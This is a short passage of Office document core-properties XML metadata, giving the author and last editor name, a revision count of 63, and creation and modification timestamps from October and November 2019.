  <dc:creator>Housley, Mike</dc:creator>
  <cp:lastModifiedBy>Housley, Mike</cp:lastModifiedBy>
  <cp:revision>63</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-30T05:06:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-02T06:19:18Z</dcterms:modified>
</cp:coreProperties>
</file>